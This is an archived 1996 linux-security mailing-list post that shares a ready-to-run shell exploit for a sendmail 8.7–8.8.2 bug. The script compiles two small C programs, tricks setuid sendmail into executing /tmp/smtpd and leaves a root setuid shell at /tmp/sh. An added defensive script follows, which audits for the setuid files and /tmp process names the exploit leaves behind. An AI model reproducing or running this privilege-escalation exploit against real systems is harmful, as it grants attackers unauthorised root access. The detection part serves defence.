[1298] in linux-security and linux-alert archive


[linux-security] Sendmail 8.8.2 exploit.

daemon@ATHENA.MIT.EDU (Dawnshadow)
Sun Nov 17 19:14:43 1996

Date: Sun, 17 Nov 1996 02:36:33 +0100 (MET)
From: Dawnshadow <sdx@linnea.asogy.stockholm.se>
To: linux-security@redhat.com
Old-X-Envelope-From: sdx@linnea.asogy.stockholm.se  Sat Nov 16 20:31:43 1996
Resent-From: linux-security@redhat.com
Reply-To: linux-security@redhat.com

Hm, look what I got hold of today.. Works if sendmail is mode 4111 or
similar:

#! /bin/sh
#
#
#                                   Hi !
#                This is exploit for sendmail smtpd bug
#    (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
#         This shell script does a root shell in /tmp directory.
#          If you have any problems with it, drop me a letter.
#                                Have fun !
#
#
#                           ----------------------
#               ---------------------------------------------
#    -----------------   Dedicated to my beautiful lady   ------------------
#               ---------------------------------------------
#                           ----------------------
#
#          Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo   'main()                                                '>>leshka.c
echo   '{                                                     '>>leshka.c
echo   '  execl("/usr/sbin/sendmail","/tmp/smtpd",0);         '>>leshka.c
echo   '}                                                     '>>leshka.c
#
#
echo   'main()                                                '>>smtpd.c
echo   '{                                                     '>>smtpd.c
echo   '  setuid(0); setgid(0);                               '>>smtpd.c
echo   '  system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh");      '>>smtpd.c
echo   '}                                                     '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs "[:digit:]" "\n"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
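
A defender's check for the traces this script leaves on a host, as an added example that is not part of the original post: a set-id file under /tmp, a process whose argv[0] points into /tmp, and the setuid sendmail binary the poster names as the precondition. The function names, the /var/tmp path and the sample ps lines are assumptions constructed for the example.

```shell
#!/bin/sh
# Added example: audit for the artifacts the posted script leaves behind.

# Set-uid or set-gid regular files under a directory (default /tmp).
# "chmod a=rsx /tmp/sh" in the posted script produces exactly such a file.
find_setid_files() {
    find "${1:-/tmp}" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# True if the named path is a set-uid regular file ("mode 4111 or similar").
is_setuid() {
    [ -f "$1" ] && [ -n "$(find "$1" -prune -perm -4000 -print 2>/dev/null)" ]
}

# Reads "PID ARGS" lines on stdin and prints those whose argv[0] lies in a
# scratch directory, as with sendmail started under the name /tmp/smtpd.
# /var/tmp is an assumption added here; the post only uses /tmp.
flag_tmp_argv0() {
    awk '$2 ~ /^\/(tmp|var\/tmp)\// { print $1, $2 }'
}

# Constructed sample of `ps -e -o pid= -o args=` output for trying the filter offline.
sample_ps() {
    printf '%s\n' '  412 /usr/sbin/sendmail -bd -q15m' \
                  ' 9321 /tmp/smtpd' \
                  ' 9400 -bash'
}

# Run all three checks against the live system.
audit() {
    if is_setuid /usr/sbin/sendmail; then
        echo "setuid binary: /usr/sbin/sendmail"
    fi
    for d in /tmp /var/tmp; do
        find_setid_files "$d" | sed 's/^/set-id file in scratch dir: /'
    done
    ps -e -o pid= -o args= | flag_tmp_argv0 | sed 's/^/argv[0] in scratch dir: /'
}

if [ "${1:-}" = "--audit" ]; then audit; fi
```

Run it with `--audit` to check the live system; `sample_ps | flag_tmp_argv0` shows the process filter on the constructed input.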

